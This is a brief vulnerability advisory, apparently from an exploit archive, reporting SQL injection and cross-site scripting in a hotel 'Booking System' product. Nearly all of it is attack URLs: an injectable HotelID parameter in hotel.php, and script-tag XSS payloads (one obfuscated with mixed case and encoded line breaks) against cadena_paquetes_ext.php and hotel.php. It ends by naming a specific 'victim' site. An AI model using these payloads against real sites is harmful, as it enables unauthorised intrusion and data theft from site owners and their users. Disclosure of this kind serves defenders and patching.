#########################################################
---------------------------------------------------------
Portal Name: Booking System
Vendor : www.bookingcentre.eu
Vulnerable File : cadena_paquetes_ext.php,hotel.php
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/hotel.php?HotelID=[SQL]

[XSS]:
http://site.com/cadena_paquetes_ext.php?HotelID=pouya_Server&PaqueteID=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
http://site.com/hotel.php?HotelID=<script>alert(1369)</script>
---------------------------------

Victem :
http://demo.hotelsadmin.com/www_en/